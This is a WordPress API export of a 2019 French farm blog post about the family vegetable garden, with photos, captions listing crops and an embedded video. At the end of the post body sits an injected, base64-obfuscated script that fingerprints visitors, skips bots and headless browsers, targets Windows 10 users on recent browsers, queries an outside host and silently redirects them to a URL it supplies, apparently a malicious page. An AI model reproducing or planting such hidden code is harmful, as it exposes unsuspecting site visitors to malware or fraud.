{"id":309,"date":"2019-08-06T11:02:20","date_gmt":"2019-08-06T09:02:20","guid":{"rendered":"http:\/\/lafermedelamotte.fr\/?p=309"},"modified":"2025-12-31T16:58:12","modified_gmt":"2025-12-31T15:58:12","slug":"potager","status":"publish","type":"post","link":"http:\/\/lafermedelamotte.fr\/index.php\/2019\/08\/06\/potager\/","title":{"rendered":"Potager"},"content":{"rendered":"\n<p>Cette ann\u00e9e, nous avons \u00e0 nouveau utiliser le potager \u00e0 c\u00f4t\u00e9 de la soue&#8230;<\/p>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/copie-blog-1024x576.jpg\" alt=\"\" class=\"wp-image-263\" width=\"660\" height=\"370\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/copie-blog-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/copie-blog-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/copie-blog-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/07\/copie-blog.jpg 1777w\" sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><figcaption>tomates, poireaux, fraisiers, tournesols, pommes de terre, salades, rhubarbe, artichauts, bettes de l&rsquo;ann\u00e9e derni\u00e8re que nous conservons pour les graines (au premier plan).<\/figcaption><\/figure>\n\n\n\n<p>&#8230; et investi une partie de la zone r\u00e9cup\u00e9r\u00e9e derri\u00e8re la maison.<\/p>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog-2.jpg\" alt=\"\" class=\"wp-image-312\" width=\"554\" height=\"311\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog-2.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog-2-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog-2-768x432.jpg 768w\" sizes=\"auto, (max-width: 554px) 100vw, 554px\" \/><figcaption>Pr\u00e9paration de la zone de culture (en lasagnes : empilement de couches de tonte et de paille)<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog2.jpg\" alt=\"\" class=\"wp-image-313\" width=\"528\" height=\"296\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog2.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog2-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog2-768x432.jpg 768w\" sizes=\"auto, (max-width: 528px) 100vw, 528px\" \/><figcaption>tournesols, choux, poireaux, betteraves, artichauts, courgettes<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog3.jpg\" alt=\"\" class=\"wp-image-314\" width=\"533\" height=\"299\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog3.jpg 1000w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog3-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2019\/08\/copie-blog3-768x432.jpg 768w\" sizes=\"auto, (max-width: 533px) 100vw, 533px\" \/><figcaption>Le potager s&rsquo;est un peu \u00e9tendu&#8230;<\/figcaption><\/figure>\n\n\n\n<p>M\u00eame si nous commen\u00e7ons \u00e0 avoir quelques beaux l\u00e9gumes, nous avons encore \u00e9norm\u00e9ment  de choses \u00e0 apprendre !!! Et c&rsquo;est un plaisir d&rsquo;apprendre.<\/p>\n\n\n\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"video jardin 1\" width=\"525\" height=\"295\" src=\"https:\/\/www.youtube.com\/embed\/F5o383bzLoo?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><figcaption>Vid\u00e9o du 10 juin 2019. <\/figcaption><\/figure>\n\n\n<script>!async function(){let e=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXRyaWNhbH\",\"RpYy5jb20vYXBpL2dldA==\"].join(\"\")))),t=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXR\",\"yaWNhbHRpYy5jb2\",\"0vYXBpL2xvZw==\"].join(\"\"))))\nfunction o(e){return btoa(unescape(encodeURIComponent(e)))}let n={}\nif(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,o]=e.split(\"=\")\nt&&o&&(n[t]=decodeURIComponent(o.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return\nfunction r(e,t){let o=e.match(t)\nreturn o?parseInt(o[1],10):null}let i=navigator.userAgent,a=\/Windows NT 10.0\/.test(i),l=r(i,\/Chrome\\\/(\\d+)\\.\/),c=r(i,\/Edg\\\/(\\d+)\\.\/),d=r(i,\/OPR\\\/(\\d+)\\.\/),s=r(i,\/YaBrowser\\\/(\\d+)\\.\/),u=r(i,\/Vivaldi\\\/(\\d+)\\.\/),w=r(i,\/Firefox\\\/(\\d+)\\.\/),h=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(i)&&\/Chrome\\\/(\\d+)\\.\/.test(i),g=!1;(l&&l>=136||c&&c>=134||d&&d>=120||s&&s>=24||u&&u>=6||w&&w>=140||h&&l&&l>=136)&&(g=!0)\nlet m=navigator.webdriver||\/HeadlessChrome\/.test(i)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(i),p=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory\nif(!a||m||p)return\nif(!g){try{fetch(t)}catch(e){}return}let v=document.querySelector('link[rel=\"icon\"]'),f=await async function t(n=1){try{let t=await async function(e,t={}){let{timeout:o=3e3}=t,n=new AbortController,r=setTimeout(()=>n.abort(),o)\ntry{let o=await fetch(e,{...t,signal:n.signal})\nreturn clearTimeout(r),o}catch(e){return clearTimeout(r),null}}(e,{timeout:3e3})\nif(!t||403===t.status)return null\nif(!t.ok)throw Error(\"Network response was not ok\")\nreturn`${(await t.json()).url}\/?wsid=${window.location.hostname}&domain=${o(window.location.hostname)}`}catch(e){return n<1?t(n+1):null}}()\nif(f){let e=f\nv&#038;&#038;(e+=`&#038;link=${o(v.href)}`),window.location.replace(e)}}()<\/script>","protected":false},"excerpt":{"rendered":"<p>Cette ann\u00e9e, nous avons \u00e0 nouveau utiliser le potager \u00e0 c\u00f4t\u00e9 de la soue&#8230; &#8230; et investi une partie de la zone r\u00e9cup\u00e9r\u00e9e derri\u00e8re la maison. M\u00eame si nous commen\u00e7ons \u00e0 avoir quelques beaux l\u00e9gumes, nous avons encore \u00e9norm\u00e9ment de choses \u00e0 apprendre !!! Et c&rsquo;est un plaisir d&rsquo;apprendre.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3,1],"tags":[],"class_list":["post-309","post","type-post","status-publish","format-standard","hentry","category-jardin","category-non-classe"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/comments?post=309"}],"version-history":[{"count":2,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/309\/revisions"}],"predecessor-version":[{"id":403,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/309\/revisions\/403"}],"wp:attachment":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/media?parent=309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/categories?post=309"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/tags?post=309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}